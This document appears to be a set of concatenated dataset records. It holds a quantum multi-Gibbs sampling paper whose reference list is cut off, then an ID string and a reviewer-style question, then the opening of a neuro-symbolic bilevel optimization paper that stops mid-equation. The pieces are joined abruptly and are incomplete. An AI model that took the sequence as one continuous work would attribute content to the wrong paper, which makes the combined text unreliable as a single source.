**Chebyshev Polynomials.** We define the Chebyshev polynomial $T_d(x)$ of degree $|d|$ for every integer $d$ by $T_d(x) = 2xT_{d-1}(x) - T_{d-2}(x)$ for $d \geq 2$, with $T_0(x) = 1$ and $T_1(x) = x$. We also set $T_d(x) = T_{|d|}(x)$ for $d < 0$.

**Polynomial Approximation of Monomials.** Sachdeva & Vishnoi (2014) show that a degree-$s$ monomial can be approximated on $[-1, 1]$ by a polynomial of degree roughly $\sqrt{s}$. The exact statement is as follows:

**Theorem 2.7** (Sachdeva & Vishnoi (2014), Theorem 3.3). For positive integers $s$ and $d$, let
$$p_{s,d}(x) = \frac{1}{2^s}\sum_{i=-d}^{d} \binom{s}{\frac{s+i}{2}} T_i(x)$$
be a polynomial of degree $d$, where $\binom{n}{m} = 0$ if $m$ is not an integer between $0$ and $n$. Then, $\sup_{x \in [-1, 1]} |p_{s,d}(x) - x^s| \leq 2 \exp(-d^2/2s)$.

**Polynomial Approximation of Exponential Functions.** Using the above result and the Taylor expansion of exponential functions, we have the following theorem for the approximation of exponential functions.

**Theorem 2.8** (Sachdeva & Vishnoi (2014), Lemma 4.2). For every $\lambda > 0$ and $\delta \in (0, 1/2]$, choose $t = O(\lambda + \log(\delta^{-1}))$ and $d = O(\sqrt{t \log(\delta^{-1})})$, and define the polynomial $q_{\lambda,t,d}(x) = \exp(-\lambda) \sum_{i=0}^{t} \frac{(-\lambda)^i}{i!} p_{i,d}(x)$ of degree $d$. Then, $\sup_{x \in [-1, 1]} |q_{\lambda,t,d}(x) - \exp(-\lambda - \lambda x)| \leq \delta$.

### 2.6 SamplerTree

**SamplerTree.** The SamplerTree is a quantum data structure that combines binary tree and QRAM characteristics to efficiently construct unitaries. See Kerenidis & Prakash (2017); Gilyén et al. (2019) for more discussion. The following lemma describes the functionality of the SamplerTree data structure.

**Lemma 2.9** (Adapted from Kerenidis & Prakash (2017), Theorem 5.1, and Gilyén et al. (2019), Lemma 48 in the full version). Let $u \in \mathbb{R}_{\geq 0}^n$ be a vector. There is a data structure SamplerTree, of which an instance $T$ can maintain the vector $u$ and support the following operations:

- **Initialization:** $\text{SamplerTree.Initialize}(n, c)$: return an instance of the SamplerTree and set $u_i \leftarrow c$ for all $i \in [n]$ in this instance, where $c \geq 0$, in $O(1)$ time.
- **Assignment:** $T.\text{Assign}(i, c)$: set $u_i \leftarrow c$ for some index $i$, where $c \geq 0$, in $O(\log(n))$ time.
- **State Preparation:** output a unitary $T.\text{Prepare}(\varepsilon)$ that satisfies
$$\left\| T.\text{Prepare}(\varepsilon)|0\rangle - \sum_{i=1}^{n} \sqrt{\frac{u_i}{\|u\|_1}}|i\rangle \right\| \leq \varepsilon,$$
in $O(\log^2(n) \log^{5/2}(n\|u\|_1/\varepsilon))$ time.
- **Query Access:** output a unitary $T.\text{BlockEnc}(\beta, \varepsilon)$, where $\beta \geq \max_i |u_i|$, which is a $(1, O(1), \varepsilon)$-block-encoding of $\text{diag}(u/\beta)$, in $O(\log(n) + \log^{5/2}(\beta/\varepsilon))$ time.

### 2.7 Quantum Access to Classical Data

**Amplitude-Encoding.** The concept of amplitude-encoding was proposed in Gao et al. (2023). It specifies how classical data is stored and accessed in quantum computation.

Definition 2.3. Let $V$ be an $(a + b + c)$-qubit unitary operator acting on subsystems $A$, $B$, $C$ with $a$, $b$, $c$ qubits, respectively. $V$ is said to be a $(\beta, a, b, c)$-amplitude-encoding of a vector $u \in \mathbb{R}^n_{\geq 0}$ with $a \geq \log_2(n)$ if, for all $i \in [n]$, the following holds:
$$\langle 0|_C V |0\rangle_C |i\rangle_A |0\rangle_B = \sqrt{\frac{u_i}{\beta}} |i\rangle_A |\psi_i\rangle_B,$$
where $|\psi_i\rangle$ is a normalized pure state. When $a$, $b$, $c$ are not important or are explicit from the context, we simply call $V$ a $\beta$-amplitude-encoding of $u$.

The following lemma shows that we can transform an amplitude-encoding into a block-encoding.

Lemma 2.10 (Adapted from Gao et al. (2023), Proposition D.11). Let $V$ be a $(\beta, a, b, c)$-amplitude-encoding of a vector $u \in \mathbb{R}^n_{\geq 0}$. Then there is an algorithm $\text{AmpToBlock}(V)$ that returns (the classical description of) a $(\beta, b + 2c, 0)$-block-encoding of $\text{diag}(u)$, using $O(1)$ queries to $V$.

3 Multi-Gibbs Sampling Algorithm

In this section, we propose an improved algorithm for the multi-Gibbs sampling task. For readability, we first introduce a pre-processing procedure in the first subsection and then introduce the main algorithm, which uses the pre-processing algorithm as a subroutine.

3.1 Pre-processing

The pre-processing algorithm is shown in Algorithm 1, and its correctness and complexity are analyzed in Theorem 3.1. The idea of this algorithm is to use consistent amplitude estimation to access the classical data in the amplitude-encoding, and then use the quantum maximum finding algorithm to find the largest $\ell$ elements for the later state preparation procedure. It should be noted that amplitude estimation can only return an estimate rather than the exact value. Thus, we can only guarantee that the maximum finding returns the largest $\ell$ elements of the estimates rather than of the true values.

Algorithm 1 GibbsPre($V, \ell, \varepsilon$): pre-processing of the multi-Gibbs sampling

Input: Failure probability parameter $\varepsilon$, a $(\beta, \lceil \log(n) \rceil, O(1), O(1))$-amplitude-encoding $V$ of a vector $u \in \mathbb{R}^n_{\geq 0}$, and $\ell \in [n]$.
Output: A set $S \subseteq [n]$, and $\tilde{u}_i$'s for all $i \in S$.
1: Generate a $\Theta(\log(n\ell/\varepsilon))$-bit random string $s$.
2: $S \leftarrow \text{FindMax}(\text{AmpEst}(V', s, 1/2\beta), n, \ell, \varepsilon/2)$, where
$$V' = (\text{XOR}_{D,C})^\dagger(V \otimes I_D)(\text{XOR}_{D,C}).$$
3: for all $i \in S$ do
4: Prepare the state $\text{AmpEst}(V', s, 1/2\beta)|i\rangle|0\rangle$ and measure the last register.
5: Store the measurement result classically as $\tilde{u}_i$.
6: end for
7: Output the set $S$ and $\tilde{u}_i$'s for $i \in S$.

**Theorem 3.1.** For every $\ell \in [n]$, $\varepsilon \in (0, 1/2)$, and $(\beta, \lceil \log_2(n) \rceil, O(1), O(1))$-amplitude-encoding $V$ of a vector $u \in \mathbb{R}^n_{\geq 0}$, algorithm GibbsPre($V, \ell, \varepsilon$) (Algorithm 1) outputs the following with probability at least $1 - \varepsilon$:

- a set $S$ such that there exist $\tilde{u}_i$'s satisfying $u_i \leq \tilde{u}_i \leq u_i + 1$ for all $i \in [n]$, and $S$ contains the indices of the largest $\ell$ elements of the $\tilde{u}_i$,
- a list of non-negative real numbers $\tilde{u}_i$ for all $i \in S$,

using $O(\beta \sqrt{n\ell} \log(n\ell/\varepsilon) \log(1/\varepsilon))$ queries to $V$, in time $O(\beta \sqrt{n\ell} \log(n\ell/\varepsilon) \log(1/\varepsilon) \log(n))$.

#### 3.2 Sampling

In the following, we present the main multi-Gibbs sampling algorithm. The algorithm requires two fixed unitary matrices $P_L, P_R$ as a state-preparation pair for the linear combination of unitaries. These matrices should be chosen to satisfy the following requirements:
\[
P_L |0\rangle = \frac{1}{\sqrt{6}} |0\rangle - \frac{1}{\sqrt{6}} |1\rangle - \frac{\sqrt{2}}{\sqrt{3}} |2\rangle, \quad P_R |0\rangle = \frac{1}{2} |0\rangle + \frac{1}{2} |1\rangle + \frac{1}{2} |2\rangle + \frac{1}{2} |3\rangle. \tag{1}
\]

**Algorithm 2** Gibbs($V, k, \varepsilon$): Gibbs sampling

**Input:** A $(\beta, \lceil \log(n) \rceil, O(1), O(1))$-amplitude-encoding $V$ of the vector $u \in \mathbb{R}_{\geq 0}^n$, sample count $k$, and $\varepsilon \in (0, 1/2)$.
**Output:** Samples $i_1, i_2, \ldots, i_k$.
1: Compute $\ell = \left\lfloor \frac{k \log(k/\varepsilon)}{\beta^{1/2} \log^{1/2}(n/\varepsilon) \log(1/\varepsilon)} \right\rfloor$.
2: Compute $\varepsilon_q = \Theta(\ell \varepsilon^2/n)$.
3: Compute $t = \Theta(\beta + \log(\varepsilon_q^{-1}))$, $d = \Theta(\sqrt{t \log(\varepsilon_q^{-1})})$, and $\varepsilon_2 = \Theta(\varepsilon_q^2/d^2)$.
4: $(S, (\tilde{u}_i)_{i \in S}) \leftarrow \text{GibbsPre}(V, \ell, \varepsilon/2)$.
5: Compute $\tilde{u}_{\min} = \min_{i \in S} \tilde{u}_i$.
6: Compute $W = (n - \ell) \exp(\tilde{u}_{\min}) + \sum_{i \in S} \exp(\tilde{u}_i)$.
7: $T \leftarrow \text{SamplerTree.Initialize}(n, \tilde{u}_{\min})$.
8: $T_{\exp} \leftarrow \text{SamplerTree.Initialize}(n, \exp(\tilde{u}_{\min})/W)$.
9: for all $i \in S$ do
10: $T.\text{Assign}(i, \tilde{u}_i)$.
11: $T_{\exp}.\text{Assign}(i, \exp(\tilde{u}_i)/W)$.
12: end for
13: Compute the classical description of $U_{LCU} = \text{LCU}((T.\text{BlockEnc}(\varepsilon_2), \text{AmpToBlock}(V), I), P_L, P_R)$, where $P_L$ and $P_R$ are defined in Equation (1).
14: Compute the classical description of $U_{ET} = \text{EigenTrans}(\text{BlockAmp}(U_{LCU}, \sqrt{t}), q_{\beta,t,d}, \varepsilon_q/2)$.
15: for $l = 1, \ldots, k$ do
16: Prepare the state $|\psi_l\rangle = \text{Amp}(U_{ET} \cdot (I \otimes T_{\exp}.\text{Prepare}(\varepsilon_q)), \varepsilon/2k)$.
17: Measure $|\psi_l\rangle$ in the computational basis, and store the outcome as $i_l$.
18: end for
19: Output $i_1, \ldots, i_k$.
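As a quick sanity check on the polynomial machinery that Algorithm 2 relies on (step 14 applies $q_{\beta,t,d}$ from Theorem 2.8, which is built from the monomial approximations of Theorem 2.7), the following NumPy sketch constructs $p_{s,d}$ from the Chebyshev recurrence and evaluates the approximation errors numerically. The parameter choices are ours, purely for illustration.

```python
import numpy as np
from math import comb, factorial, exp

def p_sd(x, s, d):
    # p_{s,d}(x) = 2^{-s} sum_{i=-d..d} C(s, (s+i)/2) T_i(x)   (Theorem 2.7)
    T = [np.ones_like(x), x]            # T_0, T_1; then T_k = 2x T_{k-1} - T_{k-2}
    for _ in range(2, d + 1):
        T.append(2 * x * T[-1] - T[-2])
    total = np.zeros_like(x)
    for i in range(-d, d + 1):
        if (s + i) % 2 == 0 and 0 <= (s + i) // 2 <= s:   # binomial convention
            total += comb(s, (s + i) // 2) * T[abs(i)]
    return total / 2.0 ** s

def q(x, lam, t, d):
    # q_{lam,t,d}(x) = e^{-lam} sum_{i=0..t} (-lam)^i / i! * p_{i,d}(x)  (Theorem 2.8)
    return exp(-lam) * sum((-lam) ** i / factorial(i) * p_sd(x, i, d)
                           for i in range(t + 1))

xs = np.linspace(-1.0, 1.0, 2001)
# monomial error, bounded by 2 exp(-d^2/(2s)) ~ 0.0039 for s = 50, d = 25
print(np.max(np.abs(p_sd(xs, 50, 25) - xs ** 50)))
# exponential error for illustrative lam, t, d; should be small
lam, t, d = 4.0, 40, 30
print(np.max(np.abs(q(xs, lam, t, d) - np.exp(-lam - lam * xs))))
```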
We have the following theorem for Algorithm 2:

**Theorem 3.2.** For every $\varepsilon \in (0, 1/2)$, integer $k > 0$, and $(\beta, \lceil \log_2(n) \rceil, O(1), O(1))$-amplitude-encoding $V$ of a vector $u \in \mathbb{R}_{\geq 0}^n$ with $\beta \geq 1$, if
\[
1 \leq \frac{k \log(k/\varepsilon)}{\beta^{1/2} \log^{1/2}(n/\varepsilon) \log(1/\varepsilon)} \leq n,
\]
then with probability at least $1 - \varepsilon$, Algorithm 2 returns $k$ samples from a distribution that is $\varepsilon$-close to the Gibbs distribution of $u$, using
\[
Q_{\text{Gibbs}}(n, k, \beta, \varepsilon) = O\left(\sqrt{n k} \left( \beta^{3/4} + \beta^{1/4} \log^{1/2}(n/\varepsilon) \right) \log^{1/2}(1/\varepsilon) \log^{3/4}(n/\varepsilon) \log^{1/2}(k/\varepsilon) \right)
\]
queries to $V$, and in
\[
T_{\text{Gibbs}}(n, k, \beta, \varepsilon) = O\left( \frac{k \log(k/\varepsilon) \log(n)}{\beta^{1/2} \log^{1/2}(n/\varepsilon) \log(1/\varepsilon)} + Q_{\text{Gibbs}}(n, k, \beta, \varepsilon) \log^2(n) \log^{2.5}(n\beta/\varepsilon) \right)
\]
time.

### 4 Computing the Nash Equilibrium of Zero-sum Games

In this section, we discuss applying our multi-Gibbs sampling procedure to computing the $\varepsilon$-approximate Nash equilibrium of two-person zero-sum games.

#### 4.1 The setup

The problem setting is as follows: suppose we are given a matrix $A \in \mathbb{R}^{m \times n}$ with entries $a_{i,j} \in [0, 1]$. The goal of our algorithm is to find approximate optimal strategies $x \in \Delta_m$, $y \in \Delta_n$, such that $\max_{y' \in \Delta_n} x^\top A y' - \min_{x' \in \Delta_m} x'^\top A y \leq \varepsilon$.

#### 4.2 Quantum Optimistic Multiplicative Weight Update

**Algorithm 3** Quantum Optimistic Multiplicative Weight Update

**Input:** Quantum oracle to the elements $a_{i,j}$ of the matrix $A \in \mathbb{R}^{m \times n}$, step size $\lambda$, additive approximation error $\varepsilon$, total rounds $T$.
**Output:** The $\varepsilon$-approximate Nash equilibrium strategy pair $(u, v)$.
1: Set $u \leftarrow 0_m$, $v \leftarrow 0_n$, $\zeta^{(0)} \leftarrow 0_m$, $\eta^{(0)} \leftarrow 0_n$, $x^{(0)} \leftarrow 0_m$, and $y^{(0)} \leftarrow 0_n$.
2: for $t = 1, \ldots, T$ do
3: $(i_1^{(t)}, i_2^{(t)}, \ldots, i_T^{(t)}) \leftarrow \text{Gibbs}(-\lambda A y^{(t-1)}, T, \varepsilon_G)$.
4: $(j_1^{(t)}, j_2^{(t)}, \ldots, j_T^{(t)}) \leftarrow \text{Gibbs}(\lambda A^\top x^{(t-1)}, T, \varepsilon_G)$.
5: $\zeta^{(t)} \leftarrow \sum_{l=1}^T e(i_l^{(t)})/T$.
6: $\eta^{(t)} \leftarrow \sum_{l=1}^T e(j_l^{(t)})/T$.
7: $x^{(t)} \leftarrow x^{(t-1)} + 2\zeta^{(t)} - \zeta^{(t-1)}$.
8: $y^{(t)} \leftarrow y^{(t-1)} + 2\eta^{(t)} - \eta^{(t-1)}$.
9: $u \leftarrow u + \zeta^{(t)}$.
10: $v \leftarrow v + \eta^{(t)}$.
11: end for
12: return the pair $(u/T, v/T)$.

Gao et al. [2023] proved the following theorem for Algorithm 3.

**Theorem 4.1** (Gao et al. [2023], Theorem 3.2). Suppose $T = \Theta(\log(mn)/\varepsilon)$, $\varepsilon_G = O(\varepsilon/\log(mn))$, and $\lambda \in (0, \sqrt{3}/6)$ is a constant. Then with probability at least $2/3$, Algorithm 3 returns an $\varepsilon$-approximate Nash equilibrium for the zero-sum game $A$.
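As a purely classical point of reference, the following NumPy sketch runs the optimistic update with the quantum Gibbs sampler replaced by the exact Gibbs distribution (so the per-round estimates $\zeta^{(t)}, \eta^{(t)}$ are noiseless). The placement of the step size $\lambda$ inside the Gibbs calls follows our reading of the algorithm, and all parameter values are illustrative.

```python
import numpy as np

def gibbs_dist(v):
    # exact Gibbs distribution p_i ∝ exp(v_i); stands in for quantum sampling
    w = np.exp(v - v.max())
    return w / w.sum()

def optimistic_mwu(A, lam=0.25, T=500):
    m, n = A.shape
    y = np.zeros(n)
    x = np.zeros(m)
    zeta_prev, eta_prev = np.zeros(m), np.zeros(n)
    u, v = np.zeros(m), np.zeros(n)
    for _ in range(T):
        zeta = gibbs_dist(-lam * (A @ y))     # row player favors small (Ay)_i
        eta = gibbs_dist(lam * (A.T @ x))     # column player favors large (A^T x)_j
        x = x + 2 * zeta - zeta_prev
        y = y + 2 * eta - eta_prev
        u += zeta
        v += eta
        zeta_prev, eta_prev = zeta, eta
    return u / T, v / T

rng = np.random.default_rng(0)
A = rng.random((40, 60))
u, v = optimistic_mwu(A)
gap = (A.T @ u).max() - (A @ v).min()   # Nash gap; shrinks as T grows
print(gap)
```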
Using our Theorem 3.2, we have the following corollary:

**Corollary 4.2.** There exists a quantum algorithm that, for $\varepsilon \in (0, 1/2)$, with probability at least $2/3$, returns an $\varepsilon$-approximate Nash equilibrium for the zero-sum game $A \in \mathbb{R}^{m \times n}$, using
\[O(Q_{\text{Gibbs}}(m+n, \Theta(\log(mn)/\varepsilon), \Theta(\log(mn)/\varepsilon), \varepsilon^3)) = \tilde{O}(\sqrt{m+n}/\varepsilon^{9/4})\]
queries to $A$, and in
\[O(T_{\text{Gibbs}}(m+n, \Theta(\log(mn)/\varepsilon), \Theta(\log(mn)/\varepsilon), \varepsilon^3)) = \tilde{O}(\sqrt{m+n}/\varepsilon^{9/4})\]
time, provided that $1/\varepsilon = \tilde{O}((m+n)^2)$.

#### 4.3 Application: Linear Program Solver

As discussed in van Apeldoorn & Gilyén [2019b] and Gao et al. [2023], solving linear programs can be reduced to finding an $\varepsilon$-approximate Nash equilibrium of a related zero-sum game. See Appendix D for a more detailed discussion of the reduction. Thus, we have the following corollary:

**Corollary 4.3.** There exists a quantum algorithm that, for $\varepsilon \in (0, 1/2)$, with probability at least $2/3$, returns an $\varepsilon$-feasible and $\varepsilon$-optimal solution for the linear programming problem
\[
\begin{align*}
\text{minimize} & \quad c^T x \\
\text{subject to} & \quad Ax \leq b, \\
& \quad x \geq 0,
\end{align*}
\]
which uses
\[O(Q_{\text{Gibbs}}(m+n, \Theta(\log(mn)Rr/\varepsilon), \Theta(\log(mn)Rr/\varepsilon), (\varepsilon/Rr)^3)) = \tilde{O}(\sqrt{m+n}(Rr/\varepsilon)^{9/4})\]
queries to $A$, $b$, and $c$, and runs in
\[O(T_{\text{Gibbs}}(m+n, \Theta(\log(mn)Rr/\varepsilon), \Theta(\log(mn)Rr/\varepsilon), (\varepsilon/Rr)^3)) = \tilde{O}(\sqrt{m+n}(Rr/\varepsilon)^{9/4})\]
time, provided that $Rr/\varepsilon = \tilde{O}((m+n)^2)$.

REFERENCES

Simon Apers and Ronald de Wolf. Quantum speedup for graph sparsification, cut approximation, and Laplacian solving. *SIAM Journal on Computing*, 51(6):1703–1742, 2022. doi: 10.1137/21M1391018.

Adam Bouland, Yosheb M. Getachew, Yujia Jin, Aaron Sidford, and Kevin Tian. Quantum speedups for zero-sum games via improved dynamic Gibbs sampling. In Andreas Krause, Emma Brunskill, Kyunghyun Cho, Barbara Engelhardt, Sivan Sabato, and Jonathan Scarlett (eds.), *Proceedings of the 40th International Conference on Machine Learning*, volume 202 of *Proceedings of Machine Learning Research*, pp. 2932–2952. PMLR, 23–29 Jul 2023. URL https://proceedings.mlr.press/v202/bouland23a.html.

Fernando G. S. L. Brandão and Krysta M. Svore. Quantum speed-ups for solving semidefinite programs. In *Proceedings of the 58th IEEE Annual Symposium on Foundations of Computer Science*, pp. 415–426, 2017. doi: 10.1109/FOCS.2017.45.

Fernando G. S. L. Brandão, Amir Kalev, Tongyang Li, Cedric Yen-Yu Lin, Krysta M. Svore, and Xiaodi Wu. Quantum SDP solvers: Large speed-ups, optimality, and applications to quantum learning. In Christel Baier, Ioannis Chatzigiannakis, Paola Flocchini, and Stefano Leonardi (eds.), *Proceedings of the 46th International Colloquium on Automata, Languages, and Programming*, volume 132 of *Leibniz International Proceedings in Informatics (LIPIcs)*, pp. 27:1–27:14. Schloss Dagstuhl–Leibniz-Zentrum fuer Informatik, 2019. ISBN 978-3-95977-109-2. doi: 10.4230/LIPIcs.ICALP.2019.27.

Gilles Brassard, Peter Høyer, Michele Mosca, and Alain Tapp. Quantum amplitude amplification and estimation. In Samuel J. Lomonaco, Jr. and Howard E. Brandt (eds.), *Quantum Computation and Information*, volume 305 of *Contemporary Mathematics*, pp.
53–74. AMS, 2002. doi: 10.1090/conm/305/05215. Yair Carmon, Yujia Jin, Aaron Sidford, and Kevin Tian. Variance reduction for matrix games. In *Advances in Neural Information Processing Systems*, volume 32, 2019. URL https://proceedings.neurips.cc/paper_files/paper/2019/file/6c442e0e996fa84f344a14927703a8c1-Paper.pdf. P A M Casares and M A Martin-Delgado. A quantum interior-point predictor–corrector algorithm for linear programming. *Journal of Physics A: Mathematical and Theoretical*, 53(44):445305, oct 2020. doi: 10.1088/1751-8121/abb439. Michael B. Cohen, Yin Tat Lee, and Zhao Song. Solving linear programs in the current matrix multiplication time. *Journal of the ACM*, 68(1), 2021. ISSN 0004-5411. doi: 10.1145/3424305. Christoph Dürr, Mark Heiligman, Peter Høyer, and Mehdi Mhalla. Quantum query complexity of some graph problems. *SIAM Journal on Computing*, 35(6):1310–1328, 2006. doi: 10.1137/050644719. Minbo Gao, Zhengfeng Ji, Tongyang Li, and Qisheng Wang. Logarithmic-regret quantum learning algorithms for zero-sum games. In *Advances in Neural Information Processing Systems*, volume 36, pp. to appear, 2023. URL https://arxiv.org/abs/2304.14197. András Gilyén, Yuan Su, Guang Hao Low, and Nathan Wiebe. Quantum singular value transformation and beyond: exponential improvements for quantum matrix arithmetics. In *Proceedings of the 51st Annual ACM SIGACT Symposium on Theory of Computing*, pp. 193–204, 2019. doi: 10.1145/3313276.3316366. Michael D. Grigoriadis and Leonid G. Khachiyan. A sublinear-time randomized approximation algorithm for matrix games. *Operations Research Letters*, 18(2):53–58, 1995. ISSN 0167-6377. doi: https://doi.org/10.1016/0167-6377(95)00032-0. Lov K. Grover. Synthesis of quantum superpositions by quantum computation. *Physical Review Letters*, 85(6):1334, 2000. doi: 10.1103/PhysRevLett.85.1334. Yassine Hamoudi. Preparing many copies of a quantum state in the black-box model. *Physical Review A: Atomic, Molecular, and Optical Physics*, 105(6):062440, 2022. doi: 10.1103/PhysRevA.105.062440. Wassily Hoeffding. Probability inequalities for sums of bounded random variables. *Journal of the American Statistical Association*, 58(301):13–30, 1963. doi: 10.2307/2282952. Shunhua Jiang, Zhao Song, Omri Weinstein, and Hengjie Zhang. A faster algorithm for solving general LPs. In *Proceedings of the 53rd Annual ACM SIGACT Symposium on Theory of Computing*, STOC 2021, pp. 823–832, New York, NY, USA, 2021. Association for Computing Machinery. ISBN 9781450380539. doi: 10.1145/3406325.3451058.
uJPWeZffgl
As a follow-up question: why should we be interested in developing this equivalent formulation as a bilevel problem? What could one possibly gain that improves upon the exact inference proposed in semantic loss, deepproblog, NeSy entropy and semantic probabilistic layers?
CONVEX AND BILEVEL OPTIMIZATION FOR NEURO-SYMBOLIC INFERENCE AND LEARNING

Anonymous authors
Paper under double-blind review

ABSTRACT

We address a key challenge for neuro-symbolic (NeSy) systems by leveraging convex and bilevel optimization techniques to develop a general gradient-based framework for end-to-end neural and symbolic parameter learning. The applicability of our framework is demonstrated with NeuPSL, a state-of-the-art NeSy architecture. To achieve this, we propose a smooth primal and dual formulation of NeuPSL inference and show learning gradients are functions of the optimal dual variables. Additionally, we develop a dual block coordinate descent algorithm for the new formulation that naturally exploits warm-starts. This leads to over $100\times$ learning runtime improvements over the current best NeuPSL inference method. Finally, we provide extensive empirical evaluations across 8 datasets covering a range of tasks and demonstrate our learning framework achieves up to a 16 percentage point prediction performance improvement over alternative learning methods.

1 INTRODUCTION

The goal of neuro-symbolic (NeSy) AI is a seamless integration of neural models for processing low-level data with symbolic frameworks to reason over high-level symbolic structures [d'Avila Garcez et al., 2002; 2009; 2019]. This paper addresses an important research challenge in NeSy with the introduction of a principled and general NeSy learning framework. Further, we propose a novel inference algorithm and establish theoretical properties for a state-of-the-art NeSy system that are crucial for learning.

Our proposed learning framework builds upon NeSy energy-based models (NeSy-EBMs) [Pryor et al., 2023], a general class of NeSy systems that encompasses a variety of existing NeSy methods, including DeepProbLog [Manhaeve et al., 2018; 2021], SATNet [Wang et al., 2019], logic tensor networks [Badreddine et al., 2022], and NeuPSL [Pryor et al., 2023]. NeSy-EBMs use neural network outputs to parameterize an energy function and formulate an inference problem that may be non-smooth and constrained. Thus, predictions are not guaranteed to be a function of the inputs and parameters with an explicit form or to be differentiable, and traditional deep learning techniques are not directly applicable. We therefore equivalently formulate NeSy-EBM learning as a bilevel problem and, to support smooth first-order gradient-based optimization, propose a smoothing strategy that is novel to NeSy learning. Specifically, we replace the constrained NeSy energy function with its Moreau envelope. The augmented Lagrangian method for equality-constrained minimization is then applied with the new formulation.

We demonstrate the effectiveness of our proposed learning framework with NeuPSL. To ensure differentiability and provide principled forms of gradients for learning, we present a new formulation and regularization of NeuPSL inference as a quadratic program. Moreover, we introduce a dual block coordinate descent (dual BCD) inference algorithm for the quadratic program. The dual BCD algorithm is the first NeuPSL inference method that produces the optimal dual variables needed for both optimal primal variables and gradients for learning. Additionally, empirical results demonstrate that dual BCD is able to effectively leverage warm starts, thus improving learning runtime.
Our key contributions are: (1) An improved formulation of the NeSy-EBM learning problem that establishes a foundation for applying smooth first-order gradient-based optimization techniques; (2) A reformulation of NeuPSL inference that is used to prove continuity properties and obtain explicit forms of gradients for learning; (3) A dual BCD algorithm for NeuPSL inference that naturally produces statistics necessary for computing gradients for learning and that fully leverages warm-starts to improve learning runtime; (4) Two parallelization strategies for dual BCD inference; and (5) A thorough empirical evaluation demonstrating prediction performance improvements on 8 different datasets and a learning runtime speedup of up to $100\times$.

2 RELATED WORK

NeSy AI is an active area of research that incorporates symbolic (commonly logical and arithmetic) reasoning with neural networks (Bader & Hitzler, 2005; d'Avila Garcez et al., 2009; Besold et al., 2017; De Raedt et al., 2020; Lamb et al., 2020; Giunchiglia et al., 2022). We will show that learning for a general class of NeSy systems is naturally formulated as bilevel optimization (Bracken & McGill, 1973; Colson et al., 2007; Bard, 2013). In other words, the NeSy learning objective is a function of predictions obtained by solving a lower-level inference problem, namely symbolic reasoning. In this work, we focus on a general setting where the lower-level problem is an expressive and complex program capable of representing cyclic dependencies and ensuring the satisfaction of constraints during both learning and inference (Wang et al., 2019; Badreddine et al., 2022; Dasarth et al., 2023; Pryor et al., 2023; Cornelio et al., 2023). One prominent and tangential subgroup of such NeSy systems enforces constraints on the structure of the symbolic model, and hence the lower-level problem, to ensure the final prediction has an explicit gradient with respect to the parameters (Xu et al., 2018; Manhaeve et al., 2021; Ahmed et al., 2022).

In the deep learning community, bilevel optimization also arises in hyperparameter optimization and meta-learning (Pedregosa, 2016; Franceschi et al., 2018), generative adversarial networks (Goodfellow et al., 2014), and reinforcement learning (Sutton & Barto, 2018). Researchers typically take one of three approaches to bilevel optimization: (1) Implicit differentiation methods compute or approximate the Hessian matrix at the lower-level problem solution to derive an analytic expression for the gradient of the upper-level objective called a hypergradient (Do et al., 2007; Pedregosa, 2016; Ghadimi & Wang, 2018; Rajeswaran et al., 2019; Giovannelli et al., 2022; Khanduri et al., 2023). (2) Automatic differentiation methods unroll inference into a differentiable computational graph (Stoyanov et al., 2011; Domke, 2012; Belanger et al., 2017; Ji et al., 2021). (3) Value-function approaches reformulate the bilevel problem as a single-level constrained program using the optimal value of the lower-level objective (the value-function) to develop principled first-order gradient-based algorithms that do not require the calculation of Hessian matrices for the lower-level problem (Outrata, 1990; Liu et al., 2021; Sow et al., 2022; Liu et al., 2022; 2023; Kwon et al., 2023). Note that standard algorithms for all three approaches to bilevel optimization suggest solving the lower-level problem to derive the gradients used for optimizing the bilevel program.
Principled techniques for using approximate lower-level solutions to make progress on the bilevel program are an open research direction (Pedregosa, 2016; Liu et al., 2021). Further, the lower-level problem for NeSy learning (inference) is commonly constrained. Implicit differentiation methods have been developed for bilevel optimization with lower-level constraints (Giovannelli et al., 2022; Khanduri et al., 2023). We introduce a value-function approach.

3 NESy ENERGY-BASED MODELS

In this work, we use NeSy energy-based models (NeSy-EBMs) (Pryor et al., 2023) to develop a generally applicable NeSy learning framework. Here, we provide background on NeSy-EBMs and introduce a classification of losses that motivates the need for general learning algorithms. NeSy-EBMs are a family of EBMs (LeCun et al., 2006) that use neural model predictions to define potential functions with symbolic interpretations. NeSy-EBM energy functions are parameterized by a set of neural and symbolic weights from the domains $W_{nn}$ and $W_{sy}$, respectively, and quantify the compatibility of a target variable from a domain $\mathcal{Y}$ and neural and symbolic inputs from the domains $\mathcal{X}_{nn}$ and $\mathcal{X}_{sy}$:
$$E : \mathcal{Y} \times \mathcal{X}_{sy} \times \mathcal{X}_{nn} \times W_{sy} \times W_{nn} \rightarrow \mathbb{R}.$$
NeSy-EBM inference requires first computing the output of the neural networks, neural inference, and then minimizing the energy function over the targets, symbolic inference:
$$\arg\min_{y \in \mathcal{Y}} E(y, x_{sy}, x_{nn}, w_{sy}, w_{nn}). \tag{1}$$

NeSy-EBM learning is finding weights to create an energy function that associates lower energies to target values near their truth in a set of training data. The training data consists of $P$ samples that are tuples of symbolic variables and neural network inputs: $\{S_1 = (y_1, x_{1,sy}, x_{1,nn}), \ldots, S_P = (y_P, x_{P,sy}, x_{P,nn})\}$. Moreover, the targets $y_i$ from a training sample $S_i$ are partitioned into labeled variables, $t_i$, for which there is a corresponding truth value, and latent variables, $z_i$. Without loss of generality, we write $y_i = (t_i, z_i)$. NeSy-EBM learning losses are defined using the latent minimizer, $z_i^* \in \arg\min_{z \in Z} E((t_i, z), x_{i,sy}, x_{i,nn}, w_{sy}, w_{nn})$, the full minimizer, $y_i^* \in \arg\min_{y \in Y} E(y, x_{i,sy}, x_{i,nn}, w_{sy}, w_{nn})$, and the latent and full optimal value-functions:
\[
V_{z_i^*}(w_{sy}, w_{nn}) := E((t_i, z_i^*), x_{i,sy}, x_{i,nn}, w_{sy}, w_{nn}),
\]
\[
V_{y_i^*}(w_{sy}, w_{nn}) := E(y_i^*, x_{i,sy}, x_{i,nn}, w_{sy}, w_{nn}).
\]
Note the optimal value-functions are functions of the parameters, inputs, and symbolic variables; however, to simplify notation, we only write the parameters as arguments.

**Value-based** learning losses depend on the model weights strictly via the optimal value-functions. Two common value-based losses for NeSy-EBMs are the latent optimal value-function (energy loss), and the difference between the latent and full optimal value-functions (structured perceptron loss) (LeCun et al., 1998; Collins, 2002):
\[
L_{Energy}(E(\cdot, \cdot, \cdot, w_{sy}, w_{nn}), S_i) := V_{z_i^*}(w_{sy}, w_{nn}),
\]
\[
